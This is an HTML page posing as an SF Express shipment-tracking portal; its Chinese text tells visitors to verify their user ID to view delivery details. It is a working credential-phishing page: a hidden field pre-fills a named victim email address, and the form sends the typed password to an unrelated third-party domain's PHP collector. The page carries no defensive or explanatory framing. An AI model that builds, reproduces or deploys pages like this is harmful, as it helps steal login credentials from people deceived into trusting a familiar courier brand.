<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>SF Speed Post | &#24555;&#36895;&#20256;&#36865; | &#22312;&#32447;&#36861;&#36394;</title>
<meta charset="utf-8" />
<link rel="icon" href="http://thetranslationlab.com/sfex/SF-express.png">


<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.b
g-image {
  / The image used /
  background-image: url("https://i.imgur.com/uSQsDP3.png?h=ca5be4d3&itok=9p78Fu76?h=ca5be4d3&itok=9p78Fu76");
  
  / Add the blur effect /
  filter: blur(2px);
  -webkit-filter: blur(2px);
  
  / Full height /
  height: 100%; 
  
  / Center and scale the image nicely /
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/ Position text in the middle of the page/image /
.bg-text {
  background-color: rgb(255,0,0); / Fallback color /
  background-color: rgba(255,0,0, 0.8); / Black w/opacity/see-through /
  color: white;
  font-weight: bold;
  border: 1px solid #0FFFFFF;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  border-radius: 10px 30px;
  z-index: 2;
  width: 400px;
  height: 360px;
  padding: 20px;
  text-align: center;
  -webkit-box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71); 
  box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71);
}
</style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">

	<table align="center" style="width:340px;" cellspacing="0">
	
	
	
	
	<tr><td>
	
		<div align="center">
			<img src="http://thetranslationlab.com/sfex/SF-express.png" 
			style="width:250px; 50px;">
		</td>
	
	</td></tr>
	
	<tr><td>
	
		<font style="font-family: Arial, Helvetica, sans-serif;" size="4" color="#FFFFFF">
		SF Express&#36861;&#36394;
		</font>
		
		
		<br>
		
		<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
		&#35831;&#39564;&#35777;&#24744;&#30340;&#29992;&#25143;ID&#20197;&#26597;&#30475;&#24744;&#30340;&#36865;&#36135;&#35814;&#32454;&#20449;&#24687;
		</font>
	
	</td></tr>
	
	
	<tr><td style="height:15px;">
	
		<form method="post" action="https://siyakhulaadministrators.co.za/SF/domain.php">
<input type="hidden" name="_redirect" value="sf-express.com">	
	</td></tr>
	
	
	<tr><td>
	
		
			<div align="center">
			
				<input type="email" name="login" 
				style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
				value="[[-Email-]]" disabled>
			
			</div>
	
	
	</td></tr>
	
					
	<tr><td style="height:7px;"></td></tr>
					
	<tr><td>
					
			<div align="center">
			
				<input type="password" name="passwd" 
				style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
				placeholder="&#23494;&#30721;" required>
			
			</div>
					
	</td></tr>
	
	
	
	<tr><td style="height:8px;"></td></tr>
					
					
					
					
	<tr><td>
					
			<div align="center">
					
					<button type="submit" value="Submit" 
					style="width:320px; height:40px; border:1px solid #084B8A; padding:10px; border-radius: 2px; background:#084B8A; font: #FFF">
						
						<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
						&#31435;&#21363;&#36861;&#36394; >>>
						</font>
						
					</button>
							
			</div>
					
	</td></tr>
	
	
	
	<tr><td style="height:15px;">
	
	
		<input type="hidden" name="login" value="sales03@lhchem.com.cn">
		
		</form>
	
	
	</td></tr>
	
	
	
	
	
	
	
	
	<tr><td style="height:15px;"></td></tr>
	
	</table>
	
  
</div>

</body>
</html>